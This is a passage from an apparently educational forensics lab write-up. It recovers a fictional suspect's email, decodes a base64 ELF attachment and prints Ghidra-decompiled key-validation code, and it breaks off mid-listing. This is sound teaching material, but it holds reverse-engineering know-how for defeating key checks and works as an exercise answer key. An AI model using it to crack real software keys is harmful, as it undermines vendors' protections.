#546E7A\">2 files saved<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Recovery completed.<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>tree recup_dir.1                   \n<span class=\"go\" style=\"background: #263238;color: #546E7A\">recup_dir.1<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u251c\u2500\u2500 f0253904.h<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u251c\u2500\u2500 f0253944.txt<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2514\u2500\u2500 report.xml<\/span>\n<\/pre><\/div>\n\n\n\n<p>The recovered file <strong>f0253944.txt<\/strong> contains some <em>SMTP<\/em> messages. In the second message the suspect asks for help:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>...&lt;HEADER&gt;...\n--------------jM6TOTqkLez3lo9Yy1nE8j9E\nContent-Type: text\/plain; charset=UTF-8; format=flowed\nContent-Transfer-Encoding: 7bit\n\nHi Leon,\n\n\nsince I helped you last time owning that website, I guess it's your turn.\n\nI've been trying to find a string that passes these checks.\n\n\nCheers,\n\nJim\n\n--------------jM6TOTqkLez3lo9Yy1nE8j9E\nContent-Type: application\/octet-stream; name=\"validateKey\"\nContent-Disposition: attachment; filename=\"validateKey\"\nContent-Transfer-Encoding: base64\n\nf0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAYBAAAAAAAABAAAAAAAAAAF\n...&lt;HEXDATA&gt;...\n<\/pre><\/div>\n\n\n\n<p>First we separate the attachment, remove any line breaks and decode it.<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\"># <\/span>Extract the base64 encoded attachment from f0253944.txt\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>cat attachment.64 <span class=\"p\" style=\"background: #263238;color: #89DDFF\">|<\/span> tr -d <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'\\n\\r'<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">|<\/span> base64 -d &gt; data\n<\/pre><\/div>\n\n\n\n<p>Using the <strong>file<\/strong> command, we can find that the attachment is an executable <em>ELF<\/em> file. We can use opensource tools like <strong>ghidra<\/strong>\nto decompile the binary. Relevant parts of the decompiled binary are:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">int<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">prime<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">prime_numbers<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">];<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/ the 11th prime number<\/span>\n\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">argv<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">];<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">int<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">int<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">chk<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;&lt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">chk<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">chk<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">chk<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">chk<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">27<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">-20<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">chk<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">chk<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">30<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">14<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">chk<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">-12<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">9<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">71<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">17<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;&lt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;&lt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">-90<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">67668<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;&lt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">9<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">70<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1703936<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">80<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">109<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">11615<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span 